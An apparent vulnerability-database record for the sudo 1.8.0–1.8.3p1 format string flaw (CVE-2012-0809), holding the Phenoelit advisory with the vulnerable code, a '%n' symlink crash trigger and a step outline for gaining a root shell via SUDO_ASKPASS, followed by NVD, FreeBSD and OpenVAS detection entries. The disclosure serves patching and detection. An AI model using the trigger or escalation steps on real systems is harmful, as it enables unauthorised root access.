ID EDB-ID:18436 Type exploitdb Reporter joernchen Modified 2012-01-31T00:00:00
Description
sudo 1.8.0 - 1.8.3p1 Format String Vulnerability. CVE-2012-0809. Dos exploit for linux platform
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--++>
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
sudo 1.8.0 - 1.8.3p1 (http://sudo.ws)
[ Vendor communication ]
2012-01-24 Send vulnerability details to sudo maintainer
2012-01-24 Maintainer is embarrased
2012-01-27 Asking maintainer how the fixing goes
2012-01-27 Maintainer responds with a patch and a release date
of 2012-01-30 for the patched sudo and advisory
2012-01-30 Release of this advisory
[ Description ]
Observe src/sudo.c:
void
sudo_debug(int level, const char *fmt, ...)
{
va_list ap;
char *fmt2;
if (level > debug_level)
return;
/* Backet fmt with program name and a newline to make it a single
write */
easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
va_start(ap, fmt);
vfprintf(stderr, fmt2, ap);
va_end(ap);
efree(fmt2);
}
Here getprogname() is argv[0] and by this user controlled. So
argv[0] goes to fmt2 which then gets vfprintf()ed to stderr. The
result is a Format String vulnerability.
[ Example ]
/tmp $ ln -s /usr/bin/sudo %n
/tmp $ ./%n -D9
*** %n in writable segment detected ***
Aborted
/tmp $
A note regarding exploitability: The above example shows the result
of FORTIFY_SOURCE which makes explotitation painful but not
impossible (see [0]). Without FORTIFY_SOURCE the exploit is straight
forward:
1. Use formatstring to overwrite the setuid() call with setgid()
2. Trigger with formatstring -D9
3. Make use of SUDO_ASKPASS and have shellcode in askpass script
4. As askpass will be called after the formatstring has
overwritten setuid() the askepass script will run with uid 0
5. Enjoy the rootshell
[ Solution ]
Update to version 1.8.3.p2
[ References ]
[0] http://www.phrack.org/issues.html?issue=67&id=9
[ end of file ]
{"id": "EDB-ID:18436", "type": "exploitdb", "bulletinFamily": "exploit", "title": "sudo 1.8.0 - 1.8.3p1 Format String Vulnerability", "description": "sudo 1.8.0 - 1.8.3p1 Format String Vulnerability. CVE-2012-0809. Dos exploit for linux platform", "published": "2012-01-31T00:00:00", "modified": "2012-01-31T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18436/", "reporter": "joernchen", "references": [], "cvelist": ["CVE-2012-0809"], "lastseen": "2016-02-02T09:43:40", "viewCount": 48, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2016-02-02T09:43:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0809"]}, {"type": "freebsd", "idList": ["7C920BB7-4B5F-11E1-9F47-00E0815B8DA8"]}, {"type": "exploitdb", "idList": ["EDB-ID:25134"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201203-06.NASL", "FREEBSD_PKG_7C920BB74B5F11E19F4700E0815B8DA8.NASL", "OPENSUSE-2012-73.NASL", "FEDORA_2012-1028.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310863995", "OPENVAS:71190", "OPENVAS:136141256231070739", "OPENVAS:136141256231071190", "OPENVAS:70739", "OPENVAS:863995"]}, {"type": "gentoo", "idList": ["GLSA-201203-06"]}, {"type": "zdt", "idList": ["1337DAY-ID-20717"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D0C0ABEBB66F120575911D213A03B73B"]}, {"type": "seebug", "idList": ["SSV:78801"]}], "modified": "2016-02-02T09:43:40", "rev": 2}, "vulnersScore": 5.4}, "sourceHref": "https://www.exploit-db.com/download/18436/", "sourceData": "Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--++>\r\n\r\n[ Authors ]\r\n joernchen <joernchen () phenoelit de>\r\n\r\n Phenoelit Group (http://www.phenoelit.de)\r\n\r\n[ Affected Products ]\r\n sudo 1.8.0 - 1.8.3p1 (http://sudo.ws)\r\n\r\n[ Vendor communication ]\r\n 2012-01-24 Send vulnerability details to sudo maintainer\r\n 2012-01-24 Maintainer is embarrased\r\n 2012-01-27 Asking maintainer how the fixing goes\r\n 2012-01-27 Maintainer responds with a patch and a release date\r\n of 2012-01-30 for the patched sudo and advisory\r\n 2012-01-30 Release of this advisory\r\n\r\n[ Description ]\r\n\r\n Observe src/sudo.c:\r\n\r\nvoid\r\nsudo_debug(int level, const char *fmt, ...)\r\n{\r\n va_list ap;\r\n char *fmt2;\r\n\r\n if (level > debug_level)\r\n return;\r\n\r\n /* Backet fmt with program name and a newline to make it a single \r\n write */\r\n easprintf(&fmt2, \"%s: %s\\n\", getprogname(), fmt);\r\n va_start(ap, fmt);\r\n vfprintf(stderr, fmt2, ap);\r\n va_end(ap);\r\n efree(fmt2);\r\n}\r\n\r\n Here getprogname() is argv[0] and by this user controlled. So \r\n argv[0] goes to fmt2 which then gets vfprintf()ed to stderr. The\r\n result is a Format String vulnerability. \r\n\r\n[ Example ]\r\n /tmp $ ln -s /usr/bin/sudo %n\r\n /tmp $ ./%n -D9\r\n *** %n in writable segment detected ***\r\n Aborted\r\n /tmp $\r\n\r\n A note regarding exploitability: The above example shows the result\r\n of FORTIFY_SOURCE which makes explotitation painful but not \r\n impossible (see [0]). Without FORTIFY_SOURCE the exploit is straight\r\n forward:\r\n 1. Use formatstring to overwrite the setuid() call with setgid()\r\n 2. Trigger with formatstring -D9 \r\n 3. Make use of SUDO_ASKPASS and have shellcode in askpass script\r\n 4. As askpass will be called after the formatstring has \r\n overwritten setuid() the askepass script will run with uid 0\r\n 5. Enjoy the rootshell\r\n \r\n[ Solution ]\r\n Update to version 1.8.3.p2 \r\n\r\n[ References ]\r\n [0] http://www.phrack.org/issues.html?issue=67&id=9\r\n\r\n[ end of file ]", "osvdbidlist": ["78659"]}
{"cve": [{"lastseen": "2020-10-03T12:06:00", "description": "Format string vulnerability in the sudo_debug function in Sudo 1.8.0 through 1.8.3p1 allows local users to execute arbitrary code via format string sequences in the program name for sudo.", "edition": 3, "cvss3": {}, "published": "2012-02-01T00:55:00", "title": "CVE-2012-0809", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0809"], "modified": "2018-01-05T02:29:00", "cpe": ["cpe:/a:todd_miller:sudo:1.8.3", "cpe:/a:todd_miller:sudo:1.8.1p2", "cpe:/a:todd_miller:sudo:1.8.1p1", "cpe:/a:todd_miller:sudo:1.8.3p1", "cpe:/a:todd_miller:sudo:1.8.0", "cpe:/a:todd_miller:sudo:1.8.2", "cpe:/a:todd_miller:sudo:1.8.1"], "id": "CVE-2012-0809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0809", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:todd_miller:sudo:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.1p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.3p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.1p1:*:*:*:*:*:*:*"]}], "freebsd": [{"lastseen": "2019-05-29T18:33:53", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0809"], "description": "\nTodd Miller reports:\n\nSudo 1.8.0 introduced simple debugging support that was primarily\n\t intended for use when developing policy or I/O logging plugins.\n\t The sudo_debug() function contains a flaw where the program name\n\t is used as part of the format string passed to the fprintf()\n\t function. The program name can be controlled by the caller,\n\t either via a symbolic link or, on some systems, by setting argv[0]\n\t when executing sudo.\nUsing standard format string vulnerability exploitation\n\t techniques it is possible to leverage this bug to achieve root\n\t privileges.\nExploitation of the bug does not require that the attacker be\n\t listed in the sudoers file. As such, we strongly suggest that\n\t affected sites upgrade from affected sudo versions as soon as\n\t possible.\n\n", "edition": 4, "modified": "2012-01-31T00:00:00", "published": "2012-01-30T00:00:00", "id": "7C920BB7-4B5F-11E1-9F47-00E0815B8DA8", "href": "https://vuxml.freebsd.org/freebsd/7c920bb7-4b5f-11e1-9f47-00e0815b8da8.html", "title": "sudo -- format string vulnerability", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2018-01-02T10:56:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "description": "Check for the Version of sudo", "modified": "2018-01-01T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:863995", "href": "http://plugins.openvas.org/nasl.php?oid=863995", "type": "openvas", "title": "Fedora Update for sudo FEDORA-2012-1028", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for sudo FEDORA-2012-1028\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"sudo on Fedora 16\";\ntag_insight = \"Sudo (superuser do) allows a system administrator to give certain\n users (or groups of users) the ability to run some (or all) commands\n as root while logging all commands and arguments. Sudo operates on a\n per-command basis. It is not a replacement for the shell. Features\n include: the ability to restrict what commands a user may run on a\n per-host basis, copious logging of each command (providing a clear\n audit trail of who did what), a configurable timeout of the sudo\n command, and the ability to use the same configuration file (sudoers)\n on many different machines.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072651.html\");\n script_id(863995);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:53:01 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2012-0809\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-1028\");\n script_name(\"Fedora Update for sudo FEDORA-2012-1028\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.3p1~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-25T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:70739", "href": "http://plugins.openvas.org/nasl.php?oid=70739", "type": "openvas", "title": "FreeBSD Ports: sudo", "sourceData": "#\n#VID 7c920bb7-4b5f-11e1-9f47-00e0815b8da8\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 7c920bb7-4b5f-11e1-9f47-00e0815b8da8\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: sudo\n\nCVE-2012-0809\nFormat string vulnerability in the sudo_debug function in Sudo 1.8.0\nthrough 1.8.3p1 allows local users to execute arbitrary code via\nformat string sequences in the program name for sudo.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.gratisoft.us/sudo/alerts/sudo_debug.html\nhttp://www.vuxml.org/freebsd/7c920bb7-4b5f-11e1-9f47-00e0815b8da8.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70739);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0809\");\n script_version(\"$Revision: 6022 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-25 14:51:04 +0200 (Tue, 25 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 07:27:19 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"FreeBSD Ports: sudo\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"sudo\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.0\")>=0 && revcomp(a:bver, b:\"1.8.3_2\")<0) {\n txt += 'Package sudo version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:1361412562310863995", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863995", "type": "openvas", "title": "Fedora Update for sudo FEDORA-2012-1028", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for sudo FEDORA-2012-1028\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072651.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863995\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:53:01 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2012-0809\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-1028\");\n script_name(\"Fedora Update for sudo FEDORA-2012-1028\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"sudo on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.3p1~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070739", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070739", "type": "openvas", "title": "FreeBSD Ports: sudo", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_sudo10.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 7c920bb7-4b5f-11e1-9f47-00e0815b8da8\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70739\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0809\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 07:27:19 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"FreeBSD Ports: sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: sudo\n\nCVE-2012-0809\nFormat string vulnerability in the sudo_debug function in Sudo 1.8.0\nthrough 1.8.3p1 allows local users to execute arbitrary code via\nformat string sequences in the program name for sudo.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.gratisoft.us/sudo/alerts/sudo_debug.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/7c920bb7-4b5f-11e1-9f47-00e0815b8da8.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"sudo\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.0\")>=0 && revcomp(a:bver, b:\"1.8.3_2\")<0) {\n txt += 'Package sudo version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809", "CVE-2011-0010"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-06.", "modified": "2017-07-07T00:00:00", "published": "2012-03-12T00:00:00", "id": "OPENVAS:71190", "href": "http://plugins.openvas.org/nasl.php?oid=71190", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-06 (sudo)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities have been discovered in sudo, allowing local\n attackers to possibly gain escalated privileges.\";\ntag_solution = \"All sudo users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/sudo-1.8.3_p2'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=351490\nhttp://bugs.gentoo.org/show_bug.cgi?id=401533\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201203-06.\";\n\n \n \nif(description)\n{\n script_id(71190);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0010\", \"CVE-2012-0809\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-12 11:35:35 -0400 (Mon, 12 Mar 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-06 (sudo)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"app-admin/sudo\", unaffected: make_list(\"ge 1.8.3_p2\", \"rge 1.7.4_p5\"), vulnerable: make_list(\"lt 1.8.3_p2\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809", "CVE-2011-0010"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-06.", "modified": "2018-10-12T00:00:00", "published": "2012-03-12T00:00:00", "id": "OPENVAS:136141256231071190", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071190", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-06 (sudo)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201203_06.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71190\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0010\", \"CVE-2012-0809\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-12 11:35:35 -0400 (Mon, 12 Mar 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-06 (sudo)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Two vulnerabilities have been discovered in sudo, allowing local\n attackers to possibly gain escalated privileges.\");\n script_tag(name:\"solution\", value:\"All sudo users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/sudo-1.8.3_p2'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-06\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=351490\");\n script_xref(name:\"URL\", 